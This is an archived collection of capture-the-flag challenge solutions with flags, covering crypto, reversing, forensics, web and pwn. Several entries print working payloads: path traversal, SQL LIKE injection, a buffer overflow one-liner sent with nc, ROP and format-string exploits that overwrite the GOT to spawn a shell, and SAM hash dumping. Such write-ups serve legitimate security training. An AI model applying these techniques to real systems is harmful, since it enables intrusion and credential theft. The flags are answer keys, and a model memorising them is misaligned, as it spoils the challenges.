Archived Challenges - September 2021

copy paste the flag

ictf{Round_14_but_easier_challenges!}

The file has a number of ANSI escape sequences in it, to print text and then clear it. You can see this with cat -v or opening it in an editor. Removing the escape sequences will yield the flag.

ictf{did_you_know_that_ANSI_escape_sequences_can_be_dangerous?}

Looking at the source code on my GitHub (linked on Discord), and doing some searching shows that in the b.bet command, there's a line of code that opens a file on the server which is filled in with user input (with open('betting/'+bet') as j:). Looking further into the source sees that when you buy the real flag, it opens flag.txt. Making the bet option ..././flag.txt opens the flag file as welcome_message and gives the flag (when ../ is removed from ..././, what's left is ../). My solve command: b.bet ..././flag.txt 10

ictf{b3tt1ng_b4g3ls_t0_m4k3_m0re_b4g3ls!}

unrot13 the code and unbase64 twice

ictf{enc0d1ng_1s_n0t_encrypt10n}

There's a few ways to solve this one. The first is just reversing the printflag function, getting the array and the LFSR values, and manually xoring them. Additionally, you could realize that the check is checking to make sure all bytes are null, and jump to the printflag code after all the bytes get xored (in GDB or the like). Finally, you could reverse the main function to realize that it's expecting the text it printed in reverse, and send this input. The code below does this.

from pwn import *

p = process(["./aibohphobia"])
b = p.recvuntil('key?')
print(b)
for c in b[::-1]:
    p.send(bytes([c]))
p.send('\n')
print(p.recvall())```

ictf{r@ts_live_0n__n0_evil_st@r}

There's a few ways of solving this and some are much easier than others. The easiest way is to replace the two prime number checks (lines 10 and 13) with the isPrime() function from Crypto.Util.number, which returns whether a number is prime or not much faster. Additionally, you could've edited line 10 and just removed line 13 entirely because all primorals (p) for the length of the flag are composite. You could have also edited the script to print the first few values of t, looked up the sequence in https://oeis.org/, saw that the sequence was one of Euclid numbers, and wrote a more optimized way of printing the flag (the method that the title/description hints at) (edit post-obfuscation: the obfuscated variables really do make this chall harder, since each line really has to be analyzed to see what it's doing. A big thanks to Robin for line 10, which is just a prime checker with tons of unnecessary recursion to make this chall just a little bit more challenging. If you were to just replace line 13 with isPrime() or just remove line 13 without editing line 10, you'll get a recursion error, meaning it's necessary to also remove the recursion. Also, if you've been participating in ictf for a couple of months now, you can draw parallels between this and ainz's chall "lookup rev", which was the inspiration for this chall) https://imaginaryctf.org/r/D7A4

ictf{A006862_1s_4_sup3r_1nt3r3st1ng_4nd_34sy_t0_und3rst4nd_s3qu3nc3_numb3r!}

The script just xors the flag, the shifted flag, and the password n times. Writing a script to invert this gets the flag.

from Crypto.Util.number import long_to_bytes as ltb, bytes_to_long as btl

tobin = lambda x: bytes("".join(f"{i:08b}" for i in x).encode())
tostr = lambda x: ltb(int(x, 2))
xor = lambda x, y: bytes([x[z]^y[z%len(y)] for z in range(len(x))])
itb = lambda x: bytes(str(bin(x)[2:]).encode())

password = b"g1v3fl4g"
flag = bytes.fromhex("bdabad262e769d0406e0bd299850a84f57775854f7811b2235ce800d780683075773")
rounds = 5
c = b"0"*rounds
maxlen = len(c)

for u in range(pow(2, len(c))):
    x = flag
    for y in range(rounds):
        x = tobin(xor(x, password))
        n = bytes([c[y]])
        for p in range(len(x)):
            try:
                n+=b'0' if n[p] == x[p+1] else b'1'
            except:
                pass
        x = tostr(n)
    if(x[0:5] == b"ictf{"):
        print(x)
        exit()
    c = itb(int(c.decode(), 2)+1)
    c = b"0"*(maxlen-len(c)) + c
    
print("None found :(")```

ictf{h4v1nG_4_g00d_t1me_x0r1ng...}

This program accepts input via argv, permutes the given bytes, scrambles each byte using a reversible function, and checks the result against a known expected value computed from the flag. The main trick to reversing this is the tracking the steps of the computation, which is complicated by forking off several processes and communicating between them via signals and pipes.

At the start of the program, at most 34 bytes are copied from argv[1]. For each byte in the flag buffer, a new process is forked, given one of the input bytes determined by a fixed permutation. Each process is told who it's "neighbor" is, that is the program it should signal to start once its processing has been completed.

The parent process kicks off the process by signaling the first child. It computes the mangled value of its flag byte, converts this to two nibbles, and maps these to realtime signals according to a fixed mapping. It then signals its parent twice, once for each calculated nibble. It then signals its neighbor, initiating processing of the next byte. The final child signals the parent once again. If the resulting buffer matches the expected value for the flag, the win message is printed.

After figuring out the general setup steps of forking the children, noticing that signals raised in the child map to bytes in the calculated buffer should be the first step. From this, figuring out the mangling step per child should allow derivation of one flag byte per input byte. Reversing the permutation is the final step, which should yield the flag ictf{y0u_c@nt_s7op_th3_s1gn@l_m@l}

Solve script: https://imaginaryctf.org/r/581C-solve.py

ictf{y0u_c@nt_s7op_th3_s1gn@l_m@l}

curl -X IMAGINARY https://method.max49.repl.co/

ictf{but_1m4g1n4ry_1sn't_4n_http_meth0d...}

We have an injection into an SQL LIKE query that reflects the full username that was matched (only the first one). If we just insert %, we see admin is returned. Inserting ictf% gives us the flag.

ictf{Listing_100%_of_the_users}

1. get the current password requirements and create a valid password
2. send this password to /accessToken and get the signed password
3. calculate the signing key
4. create a new password that satisfies: pw ^ key == 1337
5. send the password to /state to get the port and token
6. send the token to the actual server under port and get the flag

import requests as req
from json import loads
from rstr import xeger

url = "http://67.159.89.33:9002/"

# get pw reqs
res = req.post(url + "/accessToken", json={"password": "not_valid"}).text
data = loads(res)
pw_req = data["pwReq"]
password = xeger(pw_req)
print("[*] Got password requirements:", pw_req)
print("[*] Created password:", password)


# get signing key
res = req.post(url + "/accessToken", json={"password": password}).text
data = loads(res)
signed_pw = data["signedPassword"]
pw_int = int.from_bytes(password.encode(), "big")

signing_key = signed_pw ^ pw_int
new_signed_pw = signing_key ^ 1337  # signed_pw ^ sk => 1337
print(f"[*] Extracted {signing_key = }")
print(f"[*] And signed {new_signed_pw = }")


# get state
res = req.post(url + "/state", json={"signedPassword": new_signed_pw}).text
data = loads(res)
token = data["token"]
port = data["port"]
print(f"[*] Got {port = } and {token = }")


# get flag
res = req.get(f"http://67.159.89.33:{port}/flag?token={token}").text
print(res)```

ictf{w4it!_wh0_g4v3_y0u_such_a_l33t_p4ssw0rd??_rooNervous_}

We have an injection not with actual SQL code, but the target string for a LIKE query. From there, we can recover the username byte-per-byte

ictf{n0t_4ll_1njections_ar3_creat3d_equ4l}

1. Send predictedToken=1 and futureToken=1 to the server to get the previous token. Collect about 12 of those previous tokens, then crack the underlying LCG with these 12 known states (tokens).
2. Calculate the current token and the future token (with the LCG) and send it.
3. Get the description of the algorithms and implement them.
4. Get the current op_code (do step 1 and 2 again), then create a reverse lookup and translate the algorithms.
5. Send the algorithms and get the port.
6. Send the token to the port and get the flag. If the token did not work, calculate the next token and send this to the server, and so on until it works.

https://imaginaryctf.org/r/1C34-ex.py

ictf{I_gu355_n0t_3v3n_MTD_c4n_stop_y0u..._sadge_}

The webpages are just the md5 hash of the number of times the button has been clicked. There are several fake flags that allude to this. Simply md5 hashing 13371337 and going to http://puzzler7.imaginaryctf.org:13337/8c64c9e92196bcdd76935912a21648bc will give the flag.

ictf{unsalted_hashes_deserve_to_get_hacked_and_eaten_like_tater_tots}

echo -e "1\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaadcba" | nc spclr.ch 1300

ictf{m4k3_th3_buff3r_0verfl0w_g0_brrrrrrrrrrrrrrrrrrrrrrrrrrrrr}

Underflow the buffer to overwrite the return address.

io = start()
io.recvuntil(b":")
addr = int(io.recvline().strip(), 16) + 324 # 324 found using gdb or objdump
io.sendline(b"-2")
io.sendline(str(addr).encode())
io.interactive()

ictf{y0u_h4v3_he4rd_0f_0verfl0w_but_d1d_y0u_3v3r_he4r_0f_underfl0w}

Use the underflow to overwrite the num by entering -1 as first input and then going well beyond the bounds of the buffer and write the ropchain backwards, then using - to not overwrite the canary. First we need a ropchain to leak libc and then a second one to actually execute system("/bin/sh"). Solve script: https://imaginaryctf.org/r/39CC-pwn2.py

ictf{f1l3n4m3s_m4de_1t_t00_3asy}

Use the underflow to overwrite the num by entering -1 as first input and then going well beyond the bounds of the buffer and write the ropchain backwards, then using - to not overwrite the canary. First we need a ropchain to leak libc and then a second one to actually execute system("/bin/sh"). Solve script: https://imaginaryctf.org/r/39CC-pwn2.py

ictf{TheBadGod's_Final_Message_to_His_Creation_:_We_apologize_for_the_inconvenience.}

sh #%16p%20p%20p%20p%4210632p%n%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%20p%208p%hhn

The idea is to write the address you want to write to to the stack, then write to that address. Specifically, we want to overwrite the GOT entry for free with system.

ictf{stack_control_with_format_string!}

Eth pls fill this out

ictf{an_entire_heap_of_@stros!}

Bruteforce the key, there are only 256 possibilities and the rest of the key is deterministically generated.

ictf{0nly_256_p0ss1bl3_k3ys????}

Solution 1: When the door proves its knowledge of the key, t = 1. This means r is a multiple of the order of g modulo p. You can compute this same order with sage or something (GF(p)(g).multiplicative_order()) and there are less than 10 multiples of that until you go higher than p. Since you know c and s, you have key = (s - r)/c mod (p - 1) so as long as you choose a challenge coprime with p - 1 you can compute around 10 possibilities for the key. Try them all to pass the door's challenge.

Solution 2: (Robin found this one) It's a sigma protocol (see link) with fixed randomness; you can simply connect twice because of the 2-extractability property (for instance send c = 1 then c = 2) to retrieve the key.

https://en.wikipedia.org/wiki/Proof_of_knowledge

ictf{w45_1t_tru1y_r4ndom..?}

Read the decrypted plaintext for a brief overview. You can try to get good word spacing by running it through quipqiup. https://imaginaryctf.org/r/13C1-solve.py

ictf{hkuojarmcepzsyivbdngxqwtlfe866}

We get an implementation of a cipher that upon closer inspection turns out to be an affine transformation (given a fixed key; the SBOX is a linear function) together with a single plaintext-ciphertext pair. Similar to the challenge "Almost Encryption Standard" several rounds back, we can approximate the encryption as some matrix multiplication and an addition of the affine component: $$E(x) = M\cdot x + b.$$ In contrast to that challenge, we can now however not query an arbitrary amount of input/output pairs.

Our strategy will now be to construct a variant of the encryption function $E'(x)$ where we replace every key addition $a \oplus k$ by the no-op $a \oplus 0$ instead. This will lead to a fully linear system that allows us to find $M$ and from the one given input/output pair, recover the affine component $b$. We can then simply subtract that from the flag ciphertext and decrypt with a similary patched decryption function $D'$ too.

ictf{4n_4ff1n3_c1pher_1$_4lway5_f1n3!}

Since all colors have a hex value associated with them, using an online (or not) color-from-image picker and getting all the hex values gives you the flag. https://imagecolorpicker.com/ is one of the first results that shows up for this, but returns incorrect hex values. I used https://html-color-codes.info/colors-from-image/ in the end to verify that it works. If you decided to go another route, you could've scripted this with pillow to return the value of each section and concatenate them all together to get the flag.

from PIL import Image

SECTIONS = 14

img = Image.open('colors.png').convert('RGB')
dx = img.width // SECTIONS

x = 10
while x < img.width:
    rgb = img.getpixel((x, 10))
    for c in rgb:
        print(chr(c), end='')
    x += dx```

ictf{3nc0d3_4ll_1ctf_fl4gs_1n_c0l0rs_n0w!}

Take the memory dump and use the application volatility. Get the image profile with imageinfo. Look for files with filescan and grep for flag.txt. Then use dumpfiles with the offset from the last step. Strings would also work, however this might not be the best way to do it in the future wink wink

ictf{volatility_1s_3Pic_@nD_FUN}

Using volatility, get the locations of SYSTEM and SAM using hivedump. Dump the hashes from the pc with the locations you found using hashdump and put the hash into a cracking tool.

ictf{fastcrack}

The image has a text file with the flag embedded into it with steghide. There is a vulnerability in the latest version of steghide (CVE-2021-27211) that allows you to detect if there is hidden data in a file. I made it so that steghide doesn't encrypt the embedded flag with the password so the seed can be bruteforced. the best program is stegseek, so the solution is basically stegseek --seed EoMeFNEXUAAryIa.jpg

ictf{5tegh1de_1s_Br0ken!!}

We can easily undo the shuffle by brute-forcing all possible 2-byte seeds, enumerating the swaps that happen, and applying them to the ciphertext in reverse. From there, the real challenge is how to know which plaintext is the real one. We can either do a lot of manual work to see which one makes most sense, or we can try to find some fitness/score function that gives an indication on how likely something is clean. A classical fitness function is simply taking a sum or average over (theoretical or reference) bigram frequencies. To build the reference frequencies, I chose some random english book from project gutenberg (A tale of two cities).

https://imaginaryctf.org/r/6B37-solve.py

ictf{5e147ba884bb7fb7e31388debf551b68}

You get the RGBA values and know that it's ECB, which works on each block independently using some key. So you just transform the pixel values into pixels in an image and look at it. If you can't read it (Because contrasts or if you can't read stuff like that) you can take 16 bytes from somewhere where no text is (probably the beginning of the file) and xor those 16 bytes with all following 16 bytes. Then all pixel values which are not 0 become 0xFF and you get a white on black flag. https://imaginaryctf.org/r/DC7A

ictf{ECB_w0rks_1nd3p3nd3nt}

## get flag "program"

%1$42s%6$hhn     ; write 42 to x
%1$4919s%8$hn    ; write 0x1337 to y

%1$0s%4$hhn      ; set ram addr to 0
%1$103s%3$hhn    ; write 103 (g) to ram
%1$1s%4$hhn      ; set ram addr to 1
%1$105s%3$hhn    ; write 105 (i) to ram
%1$2s%4$hhn      ; set ram addr to 2
%1$109s%3$hhn    ; write 109 (m) to ram
%1$3s%4$hhn      ; set ram addr to 3
%1$109s%3$hhn    ; write 109 (m) to ram
%1$4s%4$hhn      ; set ram addr to 4
%1$101s%3$hhn    ; write 101 (e) to ram
%1$5s%4$hhn      ; set ram addr to 5
%1$102s%3$hhn    ; write 102 (f) to ram
%1$6s%4$hhn      ; set ram addr to 6
%1$108s%3$hhn    ; write 108 (l) to ram
%1$7s%4$hhn      ; set ram addr to 7
%1$97s%3$hhn     ; write 97 (a) to ram
%1$8s%4$hhn      ; set ram addr to 8
%1$103s%3$hhn    ; write 103 (g) to ram
%1$9s%4$hhn      ; set ram addr to 9
%1$112s%3$hhn    ; write 112 (p) to ram
%1$10s%4$hhn     ; set ram addr to 10
%1$108s%3$hhn    ; write 108 (l) to ram
%1$11s%4$hhn     ; set ram addr to 11
%1$115s%3$hhn    ; write 115 (s) to ram
%1$12s%4$hhn     ; set ram addr to 12
%1$0s%3$hhn      ; write 0 (\\0) to ram
%1$0s%4$hhn      ; set ram addr to 0

%1$69s%9$hhn     ; do syscall 69```

ictf{pr1ntf_1s_w31rd_but_p0w3rful}

Running a command that prints the flag.txt file (or its reverse) will output part of the flag based on the number of letters in the command used. To get the flag, you have to run 5 commands, with 2, 3, 4, 5, and 6 letters in them, respectively.

Every command must be exactly 50 characters, so the commands below need to be padded out to the limit, but still work, even with nonexistent file names.

The commands that I found work are:

pr, nl
tac, sed, rev
less, head, tail
zmore, zless
bzmore, bzless, column

This is by no means an exhaustive list. Some notes are that bzmore and bzless both require you to press enter once. more doesn't seem to work for some reason. Additionally, simply printing ictf to stdout will trigger the flag detection, so echo ictf and printf ictf will both work.

ictf{w0wwwww_s0OOoo0O0oo0o0oOoOoOo0o0o_m@ny_wAy5_2_c47_23456_35cmb,z6at}